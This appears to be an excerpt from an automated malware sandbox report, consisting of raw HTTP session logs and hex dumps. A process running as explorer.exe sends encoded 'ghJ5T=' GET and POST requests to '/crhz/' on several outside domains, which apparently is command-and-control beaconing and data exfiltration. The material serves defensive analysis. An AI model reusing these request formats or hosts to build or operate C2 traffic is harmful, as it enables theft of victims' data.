4c 55 55 44 74 42 67 52 4c 35 4f 70 30 57 4d 33 59 50 33 6a 6b 62 63 6c 47 56 63 79 37 49 42 70 5f 70 39 6e 78 33 79 4b 34 71 4c 55 39 6b 2d 4e 52 4a 48 30 74 6f 70 43 63 6b 33 28 77 6e 76 38 34 61 49 31 46 30 56 44 33 4a 74 35 6c 28 41 74 39 58 42 4d 4f 4a 35 64 45 52 36 65 59 57 62 43 43 50 35 73 75 71 45 42 66 63 37 31 66 70 49 41 66 58 65 50 52 76 54 75 52 75 55 49 51 4f 63 57 77 77 79 28 35 50 58 4a 6d 30 4f 64 53 69 79 51 36 39 45 6f 52 44 7a 59 71 75 46 4a 61 55 76 71 76 70 4a 4a 6a 28 49 4b 37 62 7a 50 30 55 4f 45 33 77 63 37 77 62 61 6f 2d 59 35 4c 74 71 42 4c 69 70 43 6a 36 70 6b 61 6d 72 76 69 79 52 4b 31 32 73 45 4c 5f 4c 45 37 44 36 4e 5a 67 6e 47 63 49 7e 62 4c 6c 52 6b 69 51 79 4b 54 39 67 74 75 75 59 37 7a 42 71 64 52 39 4d 6d 43 30 7a 6d 31 5a 5a 71 7a 79 65 62 5a 48 35 51 65 70 6b 71 28 44 45 79 73 50 51 53 6f 41 4d 4b 64 34 6c 72 59 47 55 4d 61 7a 70 67 59 39 45 31 68 6c 46 4e 6c 72 6e 4e 61 4f 6f 5f 42 57 4e 6c 55 42 43 48 51 73 59 4b 77 5f 68 45 78 6e 47 44 4c 51 6d 4a 75 57 62 67 32 61 4f 78 4e 2d 79 33 42 61 45 50 6f 4a 49 39 72 65 7e 57 5a 66 79 43 5a 72 31 54 35
                                                                Data Ascii: ghJ5T=PAqkdS49ivc9LmwK(LTcDHEVsmqEm6IejxgrFQkuEwyWjJQPIxLwiYUbWMK7QXx8V_vGnEaYJ6Mvwn48F0I7Sy3QFBulp3S1YBdzmgSIFzajwacWNnMAzKWEKdaUX_oTmWUmJjFoj8hUUyOWddYFhB~B4Am31sPdGWsZZKCYpFMWwOkk5-7hb4u_pSBhPmusPDq_JOgAyp75AOYzwyvE57d67qaFtmnMgX2IbCT-(4Nv9SGVAgh55Sl4qENm3H4LwIZA~cKtd9VO1jDZy3~h1drqvVrz4AY-0BH6WC~_SCk9n8xapWkX3ybm4Rt_ZurcjL02EZCgpo68jm3sYbo5imu_HxgO3kgLYcDc3L0YTnJW88F18K8dx-Jvw7DLKqFz7VXbXfzYxUkGWUFqFhoUScZFddTr6Fw7e17ZxgaJrHMLw20iNfeqzPeTJbIn1ipFVldn~YDtdLjL20j3ZKkoD07YCTFjLZTpa3xC2iVYT_XLA9UY~EsuhcRC1ovWjHAj1bUuI3Twi1veHPEz8YUpcRvkWk3Py0iUyd4YJ9PolTw2AKBJ(mSspSUEMdE00iG7YgMo2eOkcmpumMn28mmQh-rao4mGw2tD0w(W0dX7FnZn7zzawiH6Gty6LoXp5odrsoERbuSN1R~NsJqEPf4T7lufGrXbVp5lcJfnMXqE085l5v(hBjD5T5A6BbxYfxXKd_XPCQYzMQzvJHLvSAnU3x5KJjOcchQzWrFJlUNtFn1RA7HJV3vqC7bc33PyVGqQugYs8QYfMwztofwwCloci4nvNV43QxrqpPSq8whu471rYgXZrzt7dRDcLykvZtfmrGez3sgRexjV0dLcZKqbTPwRgapcHxEVrTB67Xn64k4-qEpeVRPul62jkMIy2VbOE9e2CE3NubMUlzcbxrACgsqG6Dk5Qtt6sqyJLv7GPhcnGWcFYED7sXkmlOe01cgm5QqhU0NA9bghToVc69X3BX5T1X8ntLUUDtBgRL5Op0WM3YP3jkbclGVcy7IBp_p9nx3yK4qLU9k-NRJH0topCck3(wnv84aI1F0VD3Jt5l(At9XBMOJ5dER6eYWbCCP5suqEBfc71fpIAfXePRvTuRuUIQOcWwwy(5PXJm0OdSiyQ69EoRDzYquFJaUvqvpJJj(IK7bzP0UOE3wc7wbao-Y5LtqBLipCj6pkamrviyRK12sEL_LE7D6NZgnGcI~bLlRkiQyKT9gtuuY7zBqdR9MmC0zm1ZZqzyebZH5Qepkq(DEysPQSoAMKd4lrYGUMazpgY9E1hlFNlrnNaOo_BWNlUBCHQsYKw_hExnGDLQmJuWbg2aOxN-y3BaEPoJI9re~WZfyCZr1T51UYNPcZAM1-3VTlmm4bxESo05rjL8CpD8ly8-vDWBJpVTPUOCsIBW3n9G6-q-TrmE9ZFM9i9KbFzJ77A744YPNEwxU.
                                                                Jan 30, 2023 14:53:03.089288950 CET192INHTTP/1.1 404 Not Found
                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                cache-control: no-cache, must-revalidate, max-age=0
                                                                content-type: text/html; charset=UTF-8
                                                                link: <https://suachuadienlanh247.com/wp-json/>; rel="https://api.w.org/"
                                                                content-encoding: gzip
                                                                vary: Accept-Encoding
                                                                transfer-encoding: chunked
                                                                date: Mon, 30 Jan 2023 13:53:02 GMT
                                                                server: LiteSpeed
                                                                connection: close
                                                                Data Raw: 63 66 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 1a db 6e db c8 f5 39 fe 0a 9a 46 6d 32 e1 45 94 6c cb a6 c2 24 bb 49 16 2d 90 dd 04 71 b6 8b 22 0e 82 11 39 12 c7 e6 ad 33 43 cb 8a a2 e7 3e 17 fd 82 45 9f 8b 02 45 9f 76 1f b7 3f 92 3f e9 39 43 4a a2 2e 8e 1d 67 b3 6b c3 12 79 e6 dc e7 cc b9 90 be bf fd e4 f9 e3 57 7f 79 f1 54 8b 65 9a 3c d8 ba 8f 5f 5a 42 b2 61 a0 5f 30 5d 2b 38 1d b0 cb 40 cf 87 3e 60 c8 42 f8 ae 9b 0f 0b 27 a5 6e 26 76 74 2d 4c 88 10 81 9e e4 24 62 d9 d0 16 4c 52 2d cb ed 33 a1 23 2f 4a a2 07 5b 77 ee a7 54 12 2d 8c 09 17 54 06 fa f7 af be b1 8f 74 cd c5 95 84 65 e7 1a a7 49 a0 17 3c 1f b0 84 ea 5a 0c 12 03 1d 65 81 a8 61 5a 0c 9d 9c 0f dd cb 41 e6 7a de 3a 15 08 ed 93 f0 7c 85 4c 94 24 8c 4b 50 89 66 60 4a dc de ef 3a 61 9e ba 97 69 c2 8b d0 29 e2 42 31 02 4e 22 e4 ac 90 0f 8c 41 99 85 92 e5 99 81 e6 9b 13 fc 74 94 69 df 91 94 6a 81 b6 0c 70 38 2d 12 12 52 c3 3d ed 2b 63 4f fb ae b5 77 26 f6 cc a9 69 44 79 58 a6 34 93 ce ec e2 69 42 f1 cb ec dd 77 6b 71 5b 95 47 32 60 85 5e a6 a3 22 e7 12 7c 99 67 12 10 03 7d c4 22 19 07 11 bd 60 21 b5 d5 8d a5 b1 8c 49 46 12 5b 84 24 a1 41 e5 89 fb db b6 ad 9d 50 c2 c3 58 7b 9a 0d 59 46 b5 e7 85 64 29 7b 47 d0 18 ad 3f d6 5e 12 70 d5 b7 44 c6 9a 3d df 3f e1 70 80 a6 00 54 5e 89 73 30 d1 b6 81 9d 64 32 a1 0f 5e 90 21 d5 be cb a5 f6 4d 5e 66 11 d0 9d 7c f8 f9 5f b8 7f 1f 7e fe 37 d1 fe f7 77 f6 e1 e7 bf 65 5a f2 e1 a7 1f b3 58 eb ff f2 23 08 3f 8f 73 a2 81 97 ef bb 15 8b 25 03 79 de cf a5 68 98 37 c8 93 24 1f 59 10 27 2c 8b e8 a5 ee ce f0 21 06 0a ca e5 58 85 5b 92 a3 a5 0d b2 0b f6 f6 cf df 55 76 af 63 cb 71 d1 c4 25 5c b2 10 a9 af c0 46 2d 1b e8 9f 61 f2 55 22 f0 24 bc 45 07 34 c4 dc 8a 6b e5 44 39 62 52 52 ee 87 84 47 0d 8e a2 4c 53 c2 c7 6f 13 c2 87 f4 2d 4b c1 8e 2b 49 7f 75 a3 ab 68 d6 d0 f5 e0 f1 a2 48 58 a8 e2 ce 4d a2 7b 67 22 cf e6 d9 01 c3 cd c6 78 83 e8 8d 69 4a f4 07 13 fd 91 d2 e3 52 ea be 3e 8f 4b b5 88 c7 5d b7 f4 47 43 4e 8a 58 f7 5f 03 aa da 5c 5f 7f 41 39 72 85 35 16 35 c9 36 1f f6 9d 62 86 ae 76 c1 d7 49 94 b2 4c 9f 5a 0b 86 3f d0 fe 09 6c d3 8d 39 8e 68 5f 54 f8 25 4f ae c5 5f 48 3e 39 2d 3d 4a 23 f4 ad ba 1a 10 ed b4 6c 79 9e c7 f0 36 ec 82 97 f1 82 78 e8 68 58 69 51 af e9 6c 4b 2f ca 7e c2 44 4c b9 ee 4f 3e cd fa a9 a5 b3 ec 19 a4 f3 12 43 c3 c7 9c de f4 c0 d7 1c 52 74 c8 cb b4 ff 8c 09 39 77 c4 4e 7f 0e 07 18 98 9c e2 72 9d c8 96 f6 04 e1 7f 82 75 54 32 07 e7 c0 f6 03 d4 ab a9 6e aa ee c2 55 7f 84 64 a4 4f a7 6f 56 b6 09 63 75 a1 1d ec 43 51 01 aa 7d 58 90 af c7 f4 e7 ba 9e 89 17 90 4c 9e 0f 6e ee f9 59 94 6c 70 bd a5 37 1c 3b 67 d8 f4 36 9a de a8 13 98 e0 dd 45 0e ff 21 e7 d1 0b 4e 85 d0 4e 9e 3e d7 8a a4 84 9c af 52 f7 d6 a2 26 ee 45 99 b0 b1 6c 53 19 c6 7b 55 5d dc bb 4a db 3d 75
                                                                Data Ascii: cf3n9Fm2El$I-q"93C>EEv??9CJ.gkyWyTe<_ZBa_0]+8@>`B'n&vt-L$bLR-3#/J[wT-TteI<ZeaZAz:|L$KPf`J:ai)B1N"Atijp8-R=+cOw&iDyX4iBwkq[G2`^"|g}"`!IF[$APX{YFd){G?^pD=?pT^s0d2^!M^f|_~7weZX#?s%yh7$Y',!X[Uvcq%\F-aU"$E4kD9bRRGLSo-K+IuhHXM{g"xiJR>K]GCNX_\_A9r556bvILZ?l9h_T%O_H>9-=J#ly6xhXiQlK/~DLO>CRt9wNruT2nUdOoVcuCQ}XLnYlp7;g6E!NN>R&ElS{U]J=u
                                                                Jan 30, 2023 14:53:03.089373112 CET193INData Raw: 90 af a3 0d a3 cc 39 13 11 4d d8 05 77 32 2a 57 a9 56 29 3e 5e 85 47 85 5d e7 20 57 c2 81 a7 c2 1d 24 44 0a d8 78 17 b2 05 95 c2 3d 13 2e 10 66 e7 80 5e 66 b2 2c 40 f8 c3 0b ca 83 8e e3 1d 3a 07 bf 99 74 01 35 e4 7c 0c 3d 4d 44 fb 84 ff 4e 4a c8
                                                                Data Ascii: 9Mw2*WV)>^G] W$Dx=.f^f,@:t5|=MDNJ<O$+$fQ!(l7B'P%dCM,j{#YaI?_"?3rfzT{cvGQAP'z}bi S
                                                                Jan 30, 2023 14:53:03.089421988 CET194INData Raw: 84 9f 53 6e 7b 2d 64 77 d8 27 de b5 88 73 c6 2d 48 8a 87 d7 e1 b7 15 e3 03 72 d4 bd 16 71 c6 f8 18 78 77 0e 9a e8 55 ac 54 8f 67 ed 01 84 ad f0 a1 7c 4e 1f a5 34 62 44 33 ec 11 ed 9f 33 69 23 6a fd 24 b7 60 97 34 b1 39 b6 f7 7e 1b ce 14 2e c1 30
                                                                Data Ascii: Sn{-dw's-HrqxwUTg|N4bD33i#j$`49~.0'%J;nG3'k s@V/IXrP6`smc,)I|]CqD!^ !9"+NVt::~LFP7pf,LJ3;~RRl3D
                                                                Jan 30, 2023 14:53:03.102144003 CET195INData Raw: 35 63 61 0d 0a dc 5b 5f 73 e2 36 10 ff 2a 1a f2 40 ef 62 39 b2 8c 0d 0e 33 e9 80 c1 bd 3c 34 93 84 e6 a6 ed 9b 13 20 38 71 6c 0e 3b 21 29 c3 77 ef ae 24 1b f3 27 39 e2 69 8e 1e 71 c6 66 ad 45 2b fd b4 5a ed 6a c5 36 36 43 14 fc 17 46 83 de 60 22
                                                                Data Ascii: 5ca[_s6*@b93<4 8ql;!)w$'9iqfE+Zj66CF`"B.(+y*t;{[=0SuC_RL;<lbl[nf)-rY&2yeDvP_RFRPjzN(tBQ"tQ5'i.2i
                                                                Jan 30, 2023 14:53:03.102201939 CET196INData Raw: e1 7a 6a 3d 11 03 c5 5d 58 d5 b9 2b ed 68 ab ce c1 f6 d5 73 bd 16 60 ef 05 d0 56 66 f7 2e de 01 33 43 98 99 44 94 19 a6 52 52 0b b5 dc 92 5a ce db 6d 18 88 b6 2b 09 d7 96 cf 4e 4b 3d 5d b5 04 e1 18 d8 6a 60 ea 35 35 16 b2 d0 e0 5c 3e 1d b5 cc 3b
                                                                Data Ascii: zj=]X+hs`Vf.3CDRRZm+NK=]j`55\>;rX@=-@fP3>Fg+ct_<`o KtG]N+E(?M:sUw,]DvYw53;_
                                                                Jan 30, 2023 14:53:03.109050989 CET197INData Raw: 37 37 31 0d 0a ec 5d df 6f db 36 10 7e 8e ff 8a 83 8a 0e 2b 50 c9 f2 0f c5 76 eb 18 5b b7 b5 e8 43 f7 d0 74 7d 19 86 40 8e 15 45 ad 2c 09 92 5d 27 03 f6 bf ef be 23 45 49 96 9d 39 41 1b 14 4b 52 14 b6 c5 bb 23 8f 3c 92 27 92 df d1 2c ba 76 55 f0
                                                                Data Ascii: 771]o6~+Pv[Ct}@E,]'#EI9AKR#<',vUTt |I+j"OEIl9$ci?WK2*tmo6g3M}q*:p~YXMW9u%<HDH"G<#dN9*K/"t\EL,V1-
                                                                Jan 30, 2023 14:53:03.109071016 CET198INData Raw: f3 4c 9b 43 55 9d 66 e3 e9 79 57 4d 94 2c 32 15 02 32 06 6b 1a bb c3 89 e7 8e dd aa f3 e9 14 aa 17 82 ae 7a 2e 2d 17 36 3e e2 50 3e ae 3d 79 82 0f 7e 82 8f 3c 50 91 b9 f6 8d b8 92 f9 c2 5f f9 b6 9f 44 ec 2f 8a f3 bb 08 de 26 7f 70 07 dd a3 97 29
                                                                Data Ascii: LCUfyWM,22kz.-6>P>=y~<P_D/&p)gj3sHQ*_[aw:`6LGFh!iQ;@eR9X-jvbPK{$:r}Q6P}IfN#'-[8x>IDNmy:Jt
                                                                Jan 30, 2023 14:53:03.128443003 CET199INData Raw: 35 64 32 0d 0a ec 5d 4b 6f db 46 10 3e cb bf 62 a1 43 72 31 2d 4b b6 d3 3c 1d 24 4e 83 04 88 9b 20 30 d0 a3 41 4a b4 44 44 22 55 91 74 ac de 72 ee a9 c7 a0 17 3b 41 90 4b 03 04 c9 a1 80 7d e8 81 40 fe 87 fe 49 e7 b1 4f 92 92 e5 b4 40 d3 c2 07 5b
                                                                Data Ascii: 5d2]KoF>bCr1-K<$N 0AJDD"Utr;AK}@IO@[r9U"JrG~QREG!*sOdQ0StIi);b.jVM%14T/.M\O>Pfgd*/'#
                                                                Jan 30, 2023 14:53:03.128460884 CET199INData Raw: e5 04 80 5b 4d 5b a5 8c a1 a6 e0 a6 e4 c7 3e 55 73 cd 46 84 99 a5 a6 49 0e ca 13 e7 a0 4e 26 88 ab 42 63 b7 aa 7b 6f 7f 9f d0 3d cf b6 79 83 ce f6 3d 60 15 30 0d 9c 37 f8 62 99 63 43 d9 97 35 bc 61 94 66 d5 e2 e6 76 c3 f6 46 af 9e 33 9f 3b eb 9d
                                                                Data Ascii: [M[>UsFIN&Bc{o=y=`07bcC5afvF3;zuu{oPkWem,h70|;~IT@xWW)cx{@Q[Vs>|PtE;bOpjO)ACfPZ=~
                                                                Jan 30, 2023 14:53:03.128479958 CET200INData Raw: 32 32 37 0d 0a 04 b7 26 6a 87 26 ea 8a eb 75 a9 fd b6 9e 9c a5 08 fb 29 33 4d 2a 48 2e 02 58 d7 e4 59 d6 fa 83 82 f2 8c 1d 44 47 25 28 bb aa 1b 8c d2 1d a3 a7 58 e7 e4 ce 7d 96 36 0f c8 f3 6d 49 24 04 61 26 9e 94 5b 87 c8 de 24 87 41 cc 8a 37 23
                                                                Data Ascii: 227&j&u)3M*H.XYDG%(X}6mI$a&[$A7#.e?q(n*?@bU1,>!U1VCdkt]Wl}'w)~ R_4&~SNDtUNk?F3;z@8Q^kb$l
                                                                Jan 30, 2023 14:53:03.390084982 CET201INData Raw: 36 33 30 0d 0a ec 5d db 6e db 38 10 7d de 7e 85 b0 c5 a2 d6 42 35 44 ea ee 00 fb b8 ff 21 db ca 05 9b c4 41 ec a4 6e 8d fd f7 9d 19 ea ae a1 48 49 ce c3 02 29 d2 a2 a1 86 e7 90 c3 d1 48 e4 50 9c ce 0a e1 e1 e4 fc 8d 53 ff 69 db c4 41 6d 93 37 8a
                                                                Data Ascii: 630]n8}~B5D!AnHI)HPSiAm7n;7n[6/>}###Vojp*h"{l{9(%$KxE3P\:bKH}|4KU)Y DM73kU


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                15192.168.2.649733103.221.223.10480C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 30, 2023 14:53:05.346477032 CET210OUTGET /crhz/?ghJ5T=CCCEekJcxP1BHV4uutXMBlMorQncoYcW7RlEC0I+F0KDkaobIF+zubJ5fpyHcR0fDKGG4SO4PI1fmloML0V8WxzpJC6D/H2QJAQp0zm+InHs&90Z5=-8rTZKCzAmXPlO HTTP/1.1
                                                                Host: www.suachuadienlanh247.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jan 30, 2023 14:53:05.842413902 CET211INHTTP/1.1 301 Moved Permanently
                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                cache-control: no-cache, must-revalidate, max-age=0
                                                                content-type: text/html; charset=UTF-8
                                                                x-redirect-by: WordPress
                                                                location: http://suachuadienlanh247.com/crhz/?ghJ5T=CCCEekJcxP1BHV4uutXMBlMorQncoYcW7RlEC0I+F0KDkaobIF+zubJ5fpyHcR0fDKGG4SO4PI1fmloML0V8WxzpJC6D/H2QJAQp0zm+InHs&90Z5=-8rTZKCzAmXPlO
                                                                content-length: 0
                                                                date: Mon, 30 Jan 2023 13:53:05 GMT
                                                                server: LiteSpeed
                                                                connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                16192.168.2.64973476.223.105.23080C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 30, 2023 14:53:10.918714046 CET212OUTPOST /crhz/ HTTP/1.1
                                                                Host: www.hvlandscapes.biz
                                                                Connection: close
                                                                Content-Length: 191
                                                                Cache-Control: no-cache
                                                                Origin: http://www.hvlandscapes.biz
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.hvlandscapes.biz/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Data Raw: 67 68 4a 35 54 3d 67 6b 6e 50 38 4e 70 51 78 33 54 51 33 63 67 4b 7a 71 7e 50 28 51 44 47 30 4c 52 70 30 39 62 47 50 53 65 47 31 50 71 6e 48 62 35 52 30 5a 48 74 75 78 48 36 55 46 36 76 51 76 64 76 63 6c 4b 5a 41 6a 4d 75 4b 76 6d 66 56 59 52 6b 47 41 49 43 37 70 33 6a 42 51 41 52 71 30 74 66 66 37 6d 65 6c 70 65 42 52 7a 7a 51 65 54 79 6c 43 6c 52 30 55 74 57 7a 6d 45 68 37 76 79 6f 42 36 6c 6e 43 65 30 53 41 79 37 76 79 6b 56 67 64 4b 5f 4a 67 78 58 43 58 44 49 6d 6e 79 75 67 48 4b 62 7e 62 28 2d 43 78 35 2d 33 35 34 63 32 44 76 39 41 4e 52 63 79 38 44 77 41 2e 00 00 00 00 00 00 00 00
                                                                Data Ascii: ghJ5T=gknP8NpQx3TQ3cgKzq~P(QDG0LRp09bGPSeG1PqnHb5R0ZHtuxH6UF6vQvdvclKZAjMuKvmfVYRkGAIC7p3jBQARq0tff7melpeBRzzQeTylClR0UtWzmEh7vyoB6lnCe0SAy7vykVgdK_JgxXCXDImnyugHKb~b(-Cx5-354c2Dv9ANRcy8DwA.
                                                                Jan 30, 2023 14:53:10.944618940 CET212INHTTP/1.1 301 Moved Permanently
                                                                location: http://hvlandscapes.biz/crhz/
                                                                vary: Accept-Encoding
                                                                server: DPS/2.0.0-beta+sha-0ec0b2a
                                                                x-version: 0ec0b2a
                                                                x-siteid: eu-central-1
                                                                set-cookie: dps_site_id=eu-central-1; path=/
                                                                date: Mon, 30 Jan 2023 13:53:10 GMT
                                                                keep-alive: timeout=5
                                                                transfer-encoding: chunked
                                                                connection: close
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                17192.168.2.64973576.223.105.23080C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 30, 2023 14:53:13.465934992 CET215OUTPOST /crhz/ HTTP/1.1
                                                                Host: www.hvlandscapes.biz
                                                                Connection: close
                                                                Content-Length: 1455
                                                                Cache-Control: no-cache
                                                                Origin: http://www.hvlandscapes.biz
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.hvlandscapes.biz/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Data Raw: 67 68 4a 35 54 3d 67 6b 6e 50 38 4e 70 51 78 33 54 51 33 34 63 4b 67 5a 6d 50 35 77 44 46 6f 37 52 70 69 4e 62 38 50 53 53 47 31 4f 75 33 48 74 42 52 78 65 44 74 75 54 76 36 53 46 36 76 42 5f 64 72 52 46 4b 50 41 6a 5a 66 4b 75 36 6c 56 65 4a 6b 47 6a 67 43 77 4c 76 67 50 41 41 54 37 6b 74 63 66 37 6d 78 6c 6f 75 65 52 7a 32 4e 65 54 71 6c 43 58 35 30 41 4e 57 30 28 6b 68 37 76 79 6f 64 36 6c 6e 36 65 33 69 6d 79 2d 37 63 6b 6e 49 64 4c 65 46 67 79 30 61 55 58 34 6d 72 73 2d 68 44 4c 70 6e 30 6c 63 7e 38 33 62 6d 65 6d 75 53 6f 74 64 6f 43 49 50 32 47 59 77 48 65 78 49 38 44 43 57 33 6c 28 6a 45 6e 6e 36 75 4c 41 56 38 42 38 4b 41 35 66 7a 59 4e 69 5f 4f 76 54 5f 71 5f 77 55 67 32 41 37 55 73 7a 69 61 41 58 53 48 47 57 52 65 4c 6b 48 47 6c 49 6a 41 32 6b 31 53 4a 32 66 56 52 4d 54 64 30 4d 59 71 53 4f 37 54 75 39 41 57 30 47 77 42 39 28 37 42 58 71 37 49 32 58 36 44 6b 38 35 31 4d 4a 66 49 54 70 5f 62 4c 7a 2d 4f 44 66 51 41 4c 62 6b 6c 62 70 30 4c 32 6a 70 70 4c 4d 63 71 39 6c 52 6e 6e 62 6c 6e 41 43 70 28 78 34 48 62 38 28 4c 4e 4c 72 33 4f 35 51 45 36 59 4c 7a 66 34 47 5a 52 6a 4b 4e 59 2d 73 59 31 33 6f 7a 61 44 42 6e 71 31 33 38 61 34 37 49 4d 6c 6d 56 43 6a 38 71 7e 46 33 44 75 31 43 48 33 42 4c 58 67 51 6e 46 4a 37 37 5a 34 6b 4a 62 68 6f 51 6e 4b 45 4b 4a 34 6d 77 4c 28 54 4f 49 47 70 45 6e 74 79 75 4f 57 51 74 75 5a 35 6e 65 44 48 72 6e 4e 33 34 70 72 75 5a 72 47 61 66 35 6b 34 78 75 7a 77 55 38 6b 6e 64 34 75 70 70 6c 6f 66 31 71 6c 43 65 62 59 41 67 45 37 65 66 70 28 4c 6a 45 52 73 62 4d 7e 66 55 75 6f 67 6a 30 39 73 41 68 4e 44 34 46 6c 57 47 61 46 71 54 53 7e 72 47 33 34 6c 46 75 55 4e 76 50 30 39 71 61 32 43 4c 42 6a 67 62 55 53 4e 54 61 6d 65 68 4b 73 6e 51 4d 62 34 6e 74 59 66 49 51 65 59 51 35 38 7a 4d 34 49 47 63 30 75 6f 54 53 7e 2d 4a 39 6e 6c 45 46 78 4f 79 6c 58 70 32 74 7a 78 69 6f 73 58 71 48 79 49 4a 67 77 6b 35 55 49 38 71 6c 47 4e 5a 53 53 45 46 56 59 39 6f 56 41 62 33 46 55 6a 4a 39 6d 4f 31 48 59 63 68 37 65 47 36 57 52 79 66 5a 73 2d 28 4e 4d 69 56 73 73 78 68 78 51 2d 6e 49 6c 4a 55 71 71 52 6c 7a 61 44 62 34 67 57 31 34 6c 67 64 6c 44 73 51 4f 4a 42 65 53 59 6f 35 48 4d 4a 4b 41 76 4a 71 48 69 47 77 38 64 49 38 63 6e 42 64 59 51 55 67 4e 68 7a 4a 78 4d 47 6b 47 45 4f 65 34 4d 72 43 42 61 74 79 43 57 31 39 77 56 32 78 6a 34 2d 71 77 75 56 71 74 62 79 73 31 64 6a 6e 61 4d 75 63 53 6f 75 50 45 6c 4a 77 61 41 44 77 4b 35 79 45 67 6e 6c 56 62 4f 48 4f 6d 4c 36 71 66 28 45 6a 62 6f 78 39 35 44 58 66 2d 47 4c 6f 33 6f 62 30 37 67 55 4e 4b 73 57 64 55 39 62 64 65 30 49 74 72 69 45 4b 78 42 59 4c 35 65 56 36 68 71 71 34 70 4a 41 70 53 36 69 74 75 52 51 75 34 7e 67 51 41 53 4f 50 37 49 34 74 33 6f 30 4f 61 4a 68 53 32 4a 64 79 5a 7a 34 51 76 58 33 53 6c 48 31 38 79 4a 31 43 6e 74 65 5a 67 4a 4e 43 72 44 47 79 31 42 31 64 58 63 5f 34 77 64 52 53 55 4f 37 4f 75 42 59 4b 6d 35 31 30 63 69 4c 51 52 4a 76 4f 4e 50 55 45 64 72 45 51 62 62 47 4f 43 37 54 7a 73 79 69 43 63 77 70 74 72 50 57 7e 6a 54 6e 4c 52 53 63 6c 36 72 39 7e 32 72 4b 7a 52 4c 79 65 76 53 53 53 73 33 4f 34 75 65 47 68 57 78 71 48 59 6c 6a 42 51 70 55 38 46 28 47 31 41 59 42 52 6d 4a 72 73 46 34 58 35 62 4f 76 7a 6d 46 61 4a 73 74 51 43 68 52 6c 41 54 38 6b 33 75 59 58 72 79 73 59 56 45 67 55 43 2d 53 37 74 71 6b 39 42 6d 70 2d 76 74 39 71 69 78 45 73 61 45 63 59 7a 67 34 43 4b 56 65 4c 43 32 4e 74 4b 5a 67 63 6f 48 4e 50 5a 50 42 6d 77 6b 45 33 37 63 7e 36 28 57 30 38 32 58 64 36 4a 77 34 6c 41 39 7e 76 7a 39 43 64 79 61 72 52 50 36 49 34 50 77 41 76 5a 47 44 62 4f 38 4b 77 76 69 6f 34 6c 4a 6c 7a 79 6c 45 67 59 66 47 32 71 42 32 46 46 52 75 34 46 77 54 31 5a 4d 68 6a 6e 41 72 37 4b 4d 76 4e 41 71 69 35 55 78 79 52 7a 76 28 67 66 43 4b 74 28 79 6f 4d 72 72 62 46 7e 36 54 33 6c 51 56 32 48 6e 6e 63 72 35 76 73 45 53 31 31 46 6f 4f 48 39 46 64 55 7e 4b 67 6e 4f 63 76 34 38 66 79 56 72 50 63 57 44 73 7a 35 42 55 70 71 6f 34 68 7a 6a 54 48 64 4a 4e 4a 49 31 33 48 42 54 7a 7a 57 69 48 75 46 79 6d 38 48 7e 33 79 62 67 6d 42 32 4b 4b 47 47 32 4f 77 76 6d 75 39 59 77 52 79 2d 50 71 67 6c 79 2d 75 52 64 46 6a 62 6a 64 6c 48 4b 49 37 6d 56
                                                                Data Ascii: ghJ5T=gknP8NpQx3TQ34cKgZmP5wDFo7RpiNb8PSSG1Ou3HtBRxeDtuTv6SF6vB_drRFKPAjZfKu6lVeJkGjgCwLvgPAAT7ktcf7mxloueRz2NeTqlCX50ANW0(kh7vyod6ln6e3imy-7cknIdLeFgy0aUX4mrs-hDLpn0lc~83bmemuSotdoCIP2GYwHexI8DCW3l(jEnn6uLAV8B8KA5fzYNi_OvT_q_wUg2A7UsziaAXSHGWReLkHGlIjA2k1SJ2fVRMTd0MYqSO7Tu9AW0GwB9(7BXq7I2X6Dk851MJfITp_bLz-ODfQALbklbp0L2jppLMcq9lRnnblnACp(x4Hb8(LNLr3O5QE6YLzf4GZRjKNY-sY13ozaDBnq138a47IMlmVCj8q~F3Du1CH3BLXgQnFJ77Z4kJbhoQnKEKJ4mwL(TOIGpEntyuOWQtuZ5neDHrnN34pruZrGaf5k4xuzwU8knd4upplof1qlCebYAgE7efp(LjERsbM~fUuogj09sAhND4FlWGaFqTS~rG34lFuUNvP09qa2CLBjgbUSNTamehKsnQMb4ntYfIQeYQ58zM4IGc0uoTS~-J9nlEFxOylXp2tzxiosXqHyIJgwk5UI8qlGNZSSEFVY9oVAb3FUjJ9mO1HYch7eG6WRyfZs-(NMiVssxhxQ-nIlJUqqRlzaDb4gW14lgdlDsQOJBeSYo5HMJKAvJqHiGw8dI8cnBdYQUgNhzJxMGkGEOe4MrCBatyCW19wV2xj4-qwuVqtbys1djnaMucSouPElJwaADwK5yEgnlVbOHOmL6qf(Ejbox95DXf-GLo3ob07gUNKsWdU9bde0ItriEKxBYL5eV6hqq4pJApS6ituRQu4~gQASOP7I4t3o0OaJhS2JdyZz4QvX3SlH18yJ1CnteZgJNCrDGy1B1dXc_4wdRSUO7OuBYKm510ciLQRJvONPUEdrEQbbGOC7TzsyiCcwptrPW~jTnLRScl6r9~2rKzRLyevSSSs3O4ueGhWxqHYljBQpU8F(G1AYBRmJrsF4X5bOvzmFaJstQChRlAT8k3uYXrysYVEgUC-S7tqk9Bmp-vt9qixEsaEcYzg4CKVeLC2NtKZgcoHNPZPBmwkE37c~6(W082Xd6Jw4lA9~vz9CdyarRP6I4PwAvZGDbO8Kwvio4lJlzylEgYfG2qB2FFRu4FwT1ZMhjnAr7KMvNAqi5UxyRzv(gfCKt(yoMrr